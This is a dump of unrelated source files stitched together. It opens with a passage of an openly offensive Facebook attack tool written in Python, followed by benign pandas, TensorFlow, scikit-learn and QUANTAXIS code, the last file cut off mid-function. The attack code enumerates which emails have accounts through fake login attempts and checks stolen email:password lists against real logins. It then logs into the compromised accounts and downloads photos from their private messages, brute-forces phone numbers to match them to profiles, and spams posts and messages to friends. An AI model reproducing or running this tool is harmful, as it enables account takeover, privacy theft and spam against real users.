mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
transitive = getName(friend)
transitiveID = getUserID(friend)
if transitiveID == -1:
transitiveID = transitive
database.addNode(victim,transitive, transitiveID)
for element in mutual:
mutualFriend = getName(element)
mutualFriendID = getUserID(element)
if mutualFriendID == -1:
mutualFriendID = mutualFriend
database.addNode(victim,mutualFriend, mutualFriendID)
database.addEdge(victim,transitive, transitiveID, mutualFriend, mutualFriendID)
def friendlyLogout(noteID,privacy):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
return
existence = raw_input("Share an existent infected note? 1|0: ")
title = raw_input('Note title: ')
content = ''
for i in range(0,10):
content += '<p><img src="http://www.facebook.com/n/?home.php&clk_loc=5&mid=72b01a8G5af400143243G0Gd4&bcode=1.1354826874.AbllucLcWqHQbSNM&n_m=hackedby@chinoogawa-'+str(i)+'"/></p>'
arguments = {
'fb_dtsg' : fb_dtsg,
'object_id' : noteID,
'note_id' : noteID,
'id' : getC_user(),
'title' : title,
'note_content' : content,
'audience['+noteID+'][value]' : privacy,
'publish' : 'Publish',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8ahyj34fzpQ9UoHaEWy1m9ACwKyaF3pqzCAjFDxCm6qyE',
'__req' : '7',
'ttstamp' : '2658169897154120115496511690',
'__rev' : '1224624'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/notes/edit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the friendlyLogout module')
print '\rError in the friendlyLogout module\r'
raise
arguments = {
'fb_dtsg' : fb_dtsg,
'app_id' : '2347471856',
'redirect_uri' : 'https://www.facebook.com/',
'display' : 'popup',
'access_token' : '',
'sdk' : '',
'from_post' : '1',
'e2e' : '{"submit_0":1409803100561}',
'xhpc_context' : 'home',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '',
'xhpc_targetid' : getC_user(),
'xhpc_publish_type' : '1',
'xhpc_message_text' : '#FBHT rocks! #HackThePlanet! @chinoogawa powered by @MkitArgentina ',
'xhpc_message' : '#FBHT rocks! #HackThePlanet! @chinoogawa powered by @MkitArgentina ',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1409803081',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'og_suggestion_logging_data' : '',
'icon_id' : '',
'share_action_properties' : '{"object":"https:\/\/www.facebook.com\/notes\/'+getName(getC_user())+'\/'+noteID+'\/'+noteID+'"}',
'share_action_type_id' : '400681216654175',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][row_updated_time]' : '1409803103',
'audience[0][custom_value]' : privacy,
'audience[0][value]' : '111',
'__CONFIRM__' : '1',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7xu5V84Oi3S2e4oK4pomXWomwho4a',
'__req' : '7',
'ttstamp' : '26581715110910598979511876122',
'__rev' : '1398396'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/v1.0/dialog/share/submit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the friendlyLogout module')
print '\rError in the friendlyLogout module\r'
raise
def takePhotos(threads):
r = open(os.path.join("massive","fotos.txt"),"wb")
fb_dtsg = set_dtsg()
f = open(os.path.join("massive",threads),"r")
threadList = []
while True:
linea = f.readline()
if not linea:
break
threadList.append(str(linea.strip("\n")))
i = 0
for message in threadList:
arguments = {
'thread_id' : message,
'offset' : '0',
'limit' : '30',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : 'aJj2BW9t2lm9b88DgDDx2IGAKh9VoW9J6yUgByVbFkGQhbHz6C-CEy5pokAWAVbGFQiuaBKAqhB-imSCiZ3oyq4U',
'__req' : '40',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265816973899779122887410295',
'__rev' : '1458973'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/messaging/attachments/sharedphotos.php',datos)
text = response.read()
r.write(text + '\n')
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in robo de fotos')
print '\rError in robo de fotos\r'
raise
try:
to_parse = str(text).strip('for (;;);')
resultado = json.loads(to_parse)
URLS = []
for element in resultado['payload']['imagesData'].keys():
URLS.append(resultado['payload']['imagesData'][element]['URI'])
for URL in URLS:
fotos = open(os.path.join('massive','photos',str(int(time()))+'.jpg'),"wb")
handler = br.open(URL)
fotos.write(handler.read())
fotos.close()
i += 1
URLS[:]
except:
print 'no attachment in thread'
r.close()
def accountexists(mailList):
password = '#FBHTEnumerateUsers'
mails = []
try:
mailFile = open(os.path.join("PRIVATE",mailList),"r")
except:
print 'File %s doesn\'t exist' %mailList
return
try:
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"a")
verified.close()
except:
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"w")
verified.close()
while True:
line = mailFile.readline()
if not line: break
mails.append(line.strip('\n'))
mailFile.close()
driver = webdriver.Firefox()
for email in mails:
# Access the login page to get the forms
driver.delete_all_cookies()
driver.get("https://www.facebook.com/")
assert "Facebook" in driver.title
elem = driver.find_element_by_name("email")
elem.send_keys(email)
elem = driver.find_element_by_name("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
try:
line = driver.page_source
match = re.search('Por favor, vuelve a introducir tu contrase',line)
if match is not None:
print email + ' Cuenta existente :D !!'
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"a")
verified.write(email + '\n')
verified.close()
else:
print email + ' Cuenta inexistente :('
except:
logs('Fatal error while submitting the login form')
print '\rFatal error while submitting the login form\r'
driver.close()
verified.close()
def checkLogin(mailList):
global blocked
try:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"a")
except:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"w")
try:
mails = open(os.path.join("PRIVATE",mailList),"r")
except:
print '%s doesn\'t exist in PRIVATE folder' %mailList
verified.close()
return
credenciales = {}
while True:
email = mails.readline()
if not email: break
index = email.find(":")
if index != -1:
credenciales[email[0:index]] = email[index+1:].strip('\n')
for emails in credenciales.keys():
if (login(emails,credenciales[emails],'real') != -1) or (blocked == 1):
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"a")
verified.write(emails+':'+credenciales[emails]+'\n')
verified.close()
print emails + ' valid email and passowrd!!! MOTHER KAKERRRRR :D '
blocked = 0
else:
print emails + ' not valid email or password'
try:
verified.close()
except:
return
def steal():
global blocked
try:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"r")
except:
print 'File Loggedin.txt not found in loggedin folder, you should try it again!'
return
credenciales = {}
while True:
email = verified.readline()
if not email: break
index = email.find(":")
if index != -1:
credenciales[email[0:index]] = email[index+1:].strip('\n')
for emails in credenciales.keys():
if (login(emails,credenciales[emails],'real') != -1) or (blocked == 1):
print emails + ' valid email and passowrd!!! MOTHER KAKERRRRR :D '
if blocked == 1:
blocked = 0
print 'Account valid, but blocked due to location issues'
else:
check = checkPrivacy('me')
friendList, friendsName = friendshipPlot(check,'me')
fileThreads = open(os.path.join("massive","threads.txt"),"wb")
for friends in friendList:
fileThreads.write(friends+'\n')
fileThreads.close()
takePhotos("threads.txt")
else:
sleep(10)
print emails + ' not valid email or password'
def sendPrivateMessage(message,buddy):
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : str(int(time())),
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : getTime(),
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_filtered_content_bh]' : 'false',
'message_batch[0][is_filtered_content_account]' : 'false',
'message_batch[0][is_filtered_content_quasar]' : 'false',
'message_batch[0][is_filtered_content_invalid_app]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'false',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + buddy,
'message_batch[0][specific_to_list][1]' : 'fbid:' + c_user,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1394766424499:3126670212-4125121119@mail.projektitan.com>',
'message_batch[0][client_thread_id]' : 'user:'+str(c_user),
'message_batch[0][manual_retry_cnt]' : '0',
'client' : 'web_messenger',
'__user' : c_user,
'__a' : '1',
'__dyn' : 'aKTyBW8BgBlyibgggDDzbHaF8x9DzECQHyUmyVbGAGQi8VpCC-KGBxmm6oxpbGES5V8Gh6VEChyd1eFEsz-dCxK9xibyfCChQEjkwzyAAEnhRGeKmhmKVRz9Hxmi8V9-i78',
'__req' : '1w',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '2658171975212154891167782118',
'__rev' : '1925563'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def sendBroadcast(online):
print 'Cookies will be saved and deleted after execution'
try:
driver = webdriver.Firefox()
driver.get("https://www.facebook.com/")
cookies = pickle.load(open("cookies.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
open("cookies.pkl", "wb").close()
driver.get("https://m.facebook.com/buddylist.php?ref_component=mbasic_home_header&ref_page=/wap/home.php&refid=8")
assert "Active Friends" in driver.title
data = driver.page_source
driver.close()
buddies = MyParser.parseOnline(data)
if len(buddies) == 0:
print 'Mmm houston we have a problem.. ERROR'
return
message = raw_input('Enter the message to send: ')
percentage = 0.0
i = 0
for buddy in buddies:
flush()
percentage = (100.0 * i)/len(buddies)
print '\rCompleted [%.2f%%]\r'%percentage,
sendPrivateMessage(message, buddy)
i += 1
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the sendBroadcast module')
print '\rError in the sendBroadcast module\r'
raise
def bruteforceCel(first,start,end):
c_user = getC_user()
try:
f = open( os.path.join("cellphones","cellphones.txt"),"a" )
f.close()
except:
f = open( os.path.join("cellphones","cellphones.txt"),"wb" )
f.close()
percentage = 0.0
verified = 0
for cellphone in range(int(start),int(end)):
percentage = ((cellphone-int(start)) * 100.0) / (int(end) - int(start))
flush()
print '\rCompleted [%.6f%%] - %d cellphone - %d verified\r' %(percentage, cellphone, verified),
try:
response = br.open('https://www.facebook.com/typeahead/search/facebar/query/?value=["'+first+str(cellphone)+'"]&context=facebar&grammar_version=7466c20ac89f47d6185f3a651461c1b1bac9a82d&content_search_mode&viewer='+c_user+'&rsp=search&qid=8&max_results=10&sid=0.24097281275317073&__user='+c_user+'&__a=1&__dyn=7nmajEyl2qm9udDgDxyIGzGpUW9ACxO4p9GgyimEVFLFwxBxCbzESu49UJ6K59poW8xHzoyfw&__req=1o&__rev=1536505')
text = response.read()
json_dump = json.loads(text.strip('for (;;);'))
#print str(json_dump['payload']['entities'][0]['path'])
#print str(json_dump['payload']['entities'][0]['uid'])
#print first + str(cellphone)
f = open( os.path.join("cellphones","cellphones.txt"),"a" )
f.write(first + str(cellphone)+' '+str(json_dump['payload']['entities'][0]['path']) + ' ' + str(json_dump['payload']['entities'][0]['uid'])+'\n')
f.close()
verified += 1
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
f.close()
continue
| bsd-2-clause |
gfyoung/pandas | pandas/tests/extension/base/printing.py | 5 | 1167 | import io
import pytest
import pandas as pd
from .base import BaseExtensionTests
class BasePrintingTests(BaseExtensionTests):
"""Tests checking the formatting of your EA when printed."""
@pytest.mark.parametrize("size", ["big", "small"])
def test_array_repr(self, data, size):
if size == "small":
data = data[:5]
else:
data = type(data)._concat_same_type([data] * 5)
result = repr(data)
assert type(data).__name__ in result
assert f"Length: {len(data)}" in result
assert str(data.dtype) in result
if size == "big":
assert "..." in result
def test_array_repr_unicode(self, data):
result = str(data)
assert isinstance(result, str)
def test_series_repr(self, data):
ser = pd.Series(data)
assert data.dtype.name in repr(ser)
def test_dataframe_repr(self, data):
df = pd.DataFrame({"A": data})
repr(df)
def test_dtype_name_in_info(self, data):
buf = io.StringIO()
pd.DataFrame({"A": data}).info(buf=buf)
result = buf.getvalue()
assert data.dtype.name in result
| bsd-3-clause |
naturali/tensorflow | tensorflow/examples/skflow/text_classification_character_cnn.py | 6 | 4109 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is an example of using convolutional networks over characters
for DBpedia dataset to predict class from description of an entity.
This model is similar to one described in this paper:
"Character-level Convolutional Networks for Text Classification"
http://arxiv.org/abs/1509.01626
and is somewhat alternative to the Lua code from here:
https://github.com/zhangxiangxiao/Crepe
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from sklearn import metrics
import pandas
import tensorflow as tf
from tensorflow.contrib import learn
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_bool('test_with_fake_data', False,
'Test the example code with fake data.')
MAX_DOCUMENT_LENGTH = 100
N_FILTERS = 10
FILTER_SHAPE1 = [20, 256]
FILTER_SHAPE2 = [20, N_FILTERS]
POOLING_WINDOW = 4
POOLING_STRIDE = 2
def char_cnn_model(x, y):
"""Character level convolutional neural network model to predict classes."""
y = tf.one_hot(y, 15, 1, 0)
byte_list = tf.reshape(learn.ops.one_hot_matrix(x, 256),
[-1, MAX_DOCUMENT_LENGTH, 256, 1])
with tf.variable_scope('CNN_Layer1'):
# Apply Convolution filtering on input sequence.
conv1 = tf.contrib.layers.convolution2d(byte_list, N_FILTERS,
FILTER_SHAPE1, padding='VALID')
# Add a RELU for non linearity.
conv1 = tf.nn.relu(conv1)
# Max pooling across output of Convolution+Relu.
pool1 = tf.nn.max_pool(conv1, ksize=[1, POOLING_WINDOW, 1, 1],
strides=[1, POOLING_STRIDE, 1, 1], padding='SAME')
# Transpose matrix so that n_filters from convolution becomes width.
pool1 = tf.transpose(pool1, [0, 1, 3, 2])
with tf.variable_scope('CNN_Layer2'):
# Second level of convolution filtering.
conv2 = tf.contrib.layers.convolution2d(pool1, N_FILTERS,
FILTER_SHAPE2,
padding='VALID')
# Max across each filter to get useful features for classification.
pool2 = tf.squeeze(tf.reduce_max(conv2, 1), squeeze_dims=[1])
# Apply regular WX + B and classification.
prediction, loss = learn.models.logistic_regression(pool2, y)
train_op = tf.contrib.layers.optimize_loss(
loss, tf.contrib.framework.get_global_step(),
optimizer='Adam', learning_rate=0.01)
return {'class': tf.argmax(prediction, 1), 'prob': prediction}, loss, train_op
def main(unused_argv):
# Prepare training and testing data
dbpedia = learn.datasets.load_dataset(
'dbpedia', test_with_fake_data=FLAGS.test_with_fake_data, size='large')
x_train = pandas.DataFrame(dbpedia.train.data)[1]
y_train = pandas.Series(dbpedia.train.target)
x_test = pandas.DataFrame(dbpedia.test.data)[1]
y_test = pandas.Series(dbpedia.test.target)
# Process vocabulary
char_processor = learn.preprocessing.ByteProcessor(MAX_DOCUMENT_LENGTH)
x_train = np.array(list(char_processor.fit_transform(x_train)))
x_test = np.array(list(char_processor.transform(x_test)))
# Build model
classifier = learn.Estimator(model_fn=char_cnn_model)
# Train and predict
classifier.fit(x_train, y_train, steps=100)
y_predicted = [
p['class'] for p in classifier.predict(x_test, as_iterable=True)]
score = metrics.accuracy_score(y_test, y_predicted)
print('Accuracy: {0:f}'.format(score))
if __name__ == '__main__':
tf.app.run()
| apache-2.0 |
LiaoPan/scikit-learn | sklearn/metrics/cluster/unsupervised.py | 230 | 8281 | """ Unsupervised evaluation metrics. """
# Authors: Robert Layton <robertlayton@gmail.com>
#
# License: BSD 3 clause
import numpy as np
from ...utils import check_random_state
from ..pairwise import pairwise_distances
def silhouette_score(X, labels, metric='euclidean', sample_size=None,
random_state=None, **kwds):
"""Compute the mean Silhouette Coefficient of all samples.
The Silhouette Coefficient is calculated using the mean intra-cluster
distance (``a``) and the mean nearest-cluster distance (``b``) for each
sample. The Silhouette Coefficient for a sample is ``(b - a) / max(a,
b)``. To clarify, ``b`` is the distance between a sample and the nearest
cluster that the sample is not a part of.
Note that Silhouette Coefficent is only defined if number of labels
is 2 <= n_labels <= n_samples - 1.
This function returns the mean Silhouette Coefficient over all samples.
To obtain the values for each sample, use :func:`silhouette_samples`.
The best value is 1 and the worst value is -1. Values near 0 indicate
overlapping clusters. Negative values generally indicate that a sample has
been assigned to the wrong cluster, as a different cluster is more similar.
Read more in the :ref:`User Guide <silhouette_coefficient>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
labels : array, shape = [n_samples]
Predicted labels for each sample.
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by :func:`metrics.pairwise.pairwise_distances
<sklearn.metrics.pairwise.pairwise_distances>`. If X is the distance
array itself, use ``metric="precomputed"``.
sample_size : int or None
The size of the sample to use when computing the Silhouette Coefficient
on a random subset of the data.
If ``sample_size is None``, no sampling is used.
random_state : integer or numpy.RandomState, optional
The generator used to randomly select a subset of samples if
``sample_size is not None``. If an integer is given, it fixes the seed.
Defaults to the global numpy random number generator.
`**kwds` : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a scipy.spatial.distance metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
silhouette : float
Mean Silhouette Coefficient for all samples.
References
----------
.. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
Interpretation and Validation of Cluster Analysis". Computational
and Applied Mathematics 20: 53-65.
<http://www.sciencedirect.com/science/article/pii/0377042787901257>`_
.. [2] `Wikipedia entry on the Silhouette Coefficient
<http://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
"""
n_labels = len(np.unique(labels))
n_samples = X.shape[0]
if not 1 < n_labels < n_samples:
raise ValueError("Number of labels is %d. Valid values are 2 "
"to n_samples - 1 (inclusive)" % n_labels)
if sample_size is not None:
random_state = check_random_state(random_state)
indices = random_state.permutation(X.shape[0])[:sample_size]
if metric == "precomputed":
X, labels = X[indices].T[indices].T, labels[indices]
else:
X, labels = X[indices], labels[indices]
return np.mean(silhouette_samples(X, labels, metric=metric, **kwds))
def silhouette_samples(X, labels, metric='euclidean', **kwds):
"""Compute the Silhouette Coefficient for each sample.
The Silhouette Coefficient is a measure of how well samples are clustered
with samples that are similar to themselves. Clustering models with a high
Silhouette Coefficient are said to be dense, where samples in the same
cluster are similar to each other, and well separated, where samples in
different clusters are not very similar to each other.
The Silhouette Coefficient is calculated using the mean intra-cluster
distance (``a``) and the mean nearest-cluster distance (``b``) for each
sample. The Silhouette Coefficient for a sample is ``(b - a) / max(a,
b)``.
Note that Silhouette Coefficent is only defined if number of labels
is 2 <= n_labels <= n_samples - 1.
This function returns the Silhouette Coefficient for each sample.
The best value is 1 and the worst value is -1. Values near 0 indicate
overlapping clusters.
Read more in the :ref:`User Guide <silhouette_coefficient>`.
Parameters
----------
X : array [n_samples_a, n_samples_a] if metric == "precomputed", or, \
[n_samples_a, n_features] otherwise
Array of pairwise distances between samples, or a feature array.
labels : array, shape = [n_samples]
label values for each sample
metric : string, or callable
The metric to use when calculating distance between instances in a
feature array. If metric is a string, it must be one of the options
allowed by :func:`sklearn.metrics.pairwise.pairwise_distances`. If X is
the distance array itself, use "precomputed" as the metric.
`**kwds` : optional keyword parameters
Any further parameters are passed directly to the distance function.
If using a ``scipy.spatial.distance`` metric, the parameters are still
metric dependent. See the scipy docs for usage examples.
Returns
-------
silhouette : array, shape = [n_samples]
Silhouette Coefficient for each samples.
References
----------
.. [1] `Peter J. Rousseeuw (1987). "Silhouettes: a Graphical Aid to the
Interpretation and Validation of Cluster Analysis". Computational
and Applied Mathematics 20: 53-65.
<http://www.sciencedirect.com/science/article/pii/0377042787901257>`_
.. [2] `Wikipedia entry on the Silhouette Coefficient
<http://en.wikipedia.org/wiki/Silhouette_(clustering)>`_
"""
distances = pairwise_distances(X, metric=metric, **kwds)
n = labels.shape[0]
A = np.array([_intra_cluster_distance(distances[i], labels, i)
for i in range(n)])
B = np.array([_nearest_cluster_distance(distances[i], labels, i)
for i in range(n)])
sil_samples = (B - A) / np.maximum(A, B)
return sil_samples
def _intra_cluster_distance(distances_row, labels, i):
"""Calculate the mean intra-cluster distance for sample i.
Parameters
----------
distances_row : array, shape = [n_samples]
Pairwise distance matrix between sample i and each sample.
labels : array, shape = [n_samples]
label values for each sample
i : int
Sample index being calculated. It is excluded from calculation and
used to determine the current label
Returns
-------
a : float
Mean intra-cluster distance for sample i
"""
mask = labels == labels[i]
mask[i] = False
if not np.any(mask):
# cluster of size 1
return 0
a = np.mean(distances_row[mask])
return a
def _nearest_cluster_distance(distances_row, labels, i):
"""Calculate the mean nearest-cluster distance for sample i.
Parameters
----------
distances_row : array, shape = [n_samples]
Pairwise distance matrix between sample i and each sample.
labels : array, shape = [n_samples]
label values for each sample
i : int
Sample index being calculated. It is used to determine the current
label.
Returns
-------
b : float
Mean nearest-cluster distance for sample i
"""
label = labels[i]
b = np.min([np.mean(distances_row[labels == cur_label])
for cur_label in set(labels) if not cur_label == label])
return b
| bsd-3-clause |
RPGOne/Skynet | scikit-learn-c604ac39ad0e5b066d964df3e8f31ba7ebda1e0e/examples/feature_selection/plot_rfe_with_cross_validation.py | 24 | 1384 | """
===================================================
Recursive feature elimination with cross-validation
===================================================
A recursive feature elimination example with automatic tuning of the
number of features selected with cross-validation.
"""
print(__doc__)
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold
from sklearn.feature_selection import RFECV
from sklearn.datasets import make_classification
# Build a classification task using 3 informative features
# NOTE: only 3 of the 25 features carry signal, so RFECV is expected to
# settle on a small optimal subset.
X, y = make_classification(n_samples=1000, n_features=25, n_informative=3,
                           n_redundant=2, n_repeated=0, n_classes=8,
                           n_clusters_per_class=1, random_state=0)
# Create the RFE object and compute a cross-validated score.
svc = SVC(kernel="linear")
# The "accuracy" scoring is proportional to the number of correct
# classifications
rfecv = RFECV(estimator=svc, step=1, cv=StratifiedKFold(y, 2),
              scoring='accuracy')
rfecv.fit(X, y)
print("Optimal number of features : %d" % rfecv.n_features_)
# Plot number of features VS. cross-validation scores
import matplotlib.pyplot as plt
plt.figure()
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score (nb of correct classifications)")
plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
plt.show()
| bsd-3-clause |
yutiansut/QUANTAXIS | QUANTAXIS/QAUtil/QAcrypto.py | 2 | 9250 | from QUANTAXIS.QAUtil import (QASETTING, DATABASE, QA_util_log_info)
from QUANTAXIS.QAUtil.QAParameter import (FREQUENCE)
import pandas as pd
from datetime import datetime
import time
from dateutil.tz import tzutc
import pymongo
from QUANTAXIS.QAUtil.QADate_Adv import (
QA_util_str_to_Unix_timestamp,
QA_util_datetime_to_Unix_timestamp,
QA_util_timestamp_to_str,
QA_util_print_timestamp
)
def QA_util_save_raw_symbols(fetch_symnol_func, exchange):
    """Save the symbol list fetched from an exchange into MongoDB.

    If the stored symbol collection already has the same number of entries
    as the freshly fetched list, nothing is written; otherwise the old
    collection is dropped and replaced.

    Parameters
    ----------
    fetch_symnol_func : callable
        Zero-argument function object returning the list of symbol
        documents. Note this is the function itself, not its result.
    exchange : str
        Exchange code, used as the MongoDB database name.

    Returns
    -------
    list
        The symbol documents returned by ``fetch_symnol_func``.
    """
    symbols = fetch_symnol_func()
    col = QASETTING.client[exchange].symbols
    # count_documents is the non-deprecated replacement for find().count()
    # (consistent with QA_util_find_missing_kline below).
    if col.count_documents({}) == len(symbols):
        QA_util_log_info(
            "{} SYMBOLS are already existed and no more to update"
            .format(exchange)
        )
    else:
        QA_util_log_info(
            "Delete the original {} symbols collections".format(exchange)
        )
        # BUG FIX: the original used QASETTING.client.exchange, which
        # addresses a database literally named "exchange" instead of the
        # database of the requested exchange.
        QASETTING.client[exchange].drop_collection("symbols")
        QA_util_log_info("Downloading the new symbols")
        col.insert_many(symbols)
        QA_util_log_info(
            "{} Symbols download is done! Thank you man!".format(exchange)
        )
    return symbols
def QA_util_find_missing_kline(
        symbol,
        freq,
        start_epoch=datetime(2017,
                             10,
                             1,
                             tzinfo=tzutc()),
        tzlocalize='Asia/Shanghai'
):
    """Find gaps in the stored kline history of a 24/7 market.

    Scans the locally stored candlestick data for ``symbol`` at period
    ``freq`` and returns the time ranges missing between ``start_epoch``
    and now.

    Parameters
    ----------
    symbol : str
        Market symbol, e.g. ``'btcusdt'``.
    freq : str
        One of the ``FREQUENCE`` bar periods.
    start_epoch : datetime
        Earliest time the history is expected to cover (UTC).
    tzlocalize : str
        Timezone used to localize the generated date ranges; must match
        the timezone of the stored ``datetime`` fields.

    Returns
    -------
    numpy.ndarray
        Rows of ``[expected, between, missing]``: Unix timestamps bounding
        each gap plus a human readable description.
    """
    # Seconds per bar for each supported frequency.
    FREQUENCE_PERIOD_TIME = {
        FREQUENCE.ONE_MIN: 60,
        FREQUENCE.FIVE_MIN: 300,
        FREQUENCE.FIFTEEN_MIN: 900,
        FREQUENCE.THIRTY_MIN: 1800,
        FREQUENCE.SIXTY_MIN: 3600,
        FREQUENCE.HOUR: 3600,
        FREQUENCE.DAY: 86400,
    }
    if (freq != FREQUENCE.DAY):
        col = DATABASE.cryptocurrency_min
        col.create_index(
            [
                ("symbol",
                 pymongo.ASCENDING),
                ('time_stamp',
                 pymongo.ASCENDING),
                ('date_stamp',
                 pymongo.ASCENDING)
            ]
        )
        col.create_index(
            [
                ("symbol",
                 pymongo.ASCENDING),
                ("type",
                 pymongo.ASCENDING),
                ('time_stamp',
                 pymongo.ASCENDING)
            ],
            unique=True
        )
        col.create_index(
            [("type",
              pymongo.ASCENDING),
             ('time_stamp',
              pymongo.ASCENDING)]
        )
        col.create_index([('time_stamp', pymongo.ASCENDING)])
        # Query the stored minute-bar history for this symbol/period.
        query_id = {"symbol": symbol, 'type': freq}
        refcount = col.count_documents(query_id)
        _data = []
        cursor = col.find(query_id).sort('time_stamp', 1)
        for item in cursor:
            _data.append(
                [
                    str(item['symbol']),
                    item['time_stamp'],
                    item['date'],
                    item['datetime'],
                    item['type']
                ]
            )
        _data = pd.DataFrame(
            _data,
            columns=[
                'symbol',
                'time_stamp',
                'date',
                'datetime',
                'type'
            ]
        )
        _data = _data.set_index(pd.DatetimeIndex(_data['datetime']), drop=False)
    else:
        col = DATABASE.cryptocurrency_day
        col.create_index(
            [
                ("symbol",
                 pymongo.ASCENDING),
                ("date_stamp",
                 pymongo.ASCENDING)
            ],
            unique=True
        )
        # Query the stored daily history for this symbol.
        query_id = {"symbol": symbol}
        refcount = col.count_documents(query_id)
        cursor = col.find(query_id).sort('time_stamp', 1)
        _data = []
        for item in cursor:
            _data.append(
                [
                    str(item['symbol']),
                    item['time_stamp'],
                    item['date'],
                    item['datetime']
                ]
            )
        _data = pd.DataFrame(
            _data,
            columns=['symbol',
                     'time_stamp',
                     'date',
                     'datetime']
        ).drop_duplicates()
        _data['date'] = pd.to_datetime(_data['date'], utc=False)
        _data = _data.set_index(pd.DatetimeIndex(_data['date']), drop=False)
    if (freq != FREQUENCE.DAY):
        # Date/Datetime fields in cryptocurrency_min are stored as Beijing
        # time, hence the tz localization below.
        leak_datetime = pd.date_range(
            _data.index.min(),
            _data.index.max(),
            freq=freq
        ).difference(_data.index).tz_localize(tzlocalize)
        if (int(_data.iloc[0].time_stamp) >
                (QA_util_datetime_to_Unix_timestamp() + 120)):
            # A "future" timestamp usually means the default timezone
            # setting is wrong.
            raise Exception(
                'A unexpected \'Future\' timestamp got, Please check self.missing_data_list_func param \'tzlocalize\' set. More info: {:s}@{:s} at {:s} but current time is {}'
                .format(
                    symbol,
                    freq,
                    QA_util_print_timestamp(_data.iloc[0].time_stamp),
                    QA_util_print_timestamp(
                        QA_util_datetime_to_Unix_timestamp()
                    )
                )
            )
    else:
        leak_datetime = pd.date_range(
            _data.index.min(),
            _data.index.max(),
            freq='1D'
        ).difference(_data.index).tz_localize(tzlocalize)
    if (int(time.mktime(start_epoch.utctimetuple())) > int(
            _data.iloc[0].time_stamp)):
        miss_kline = pd.DataFrame(columns=['expected', 'between', 'missing'])
    else:
        # History starts later than requested: the leading range is missing.
        miss_kline = pd.DataFrame(
            [
                [
                    int(time.mktime(start_epoch.utctimetuple())),
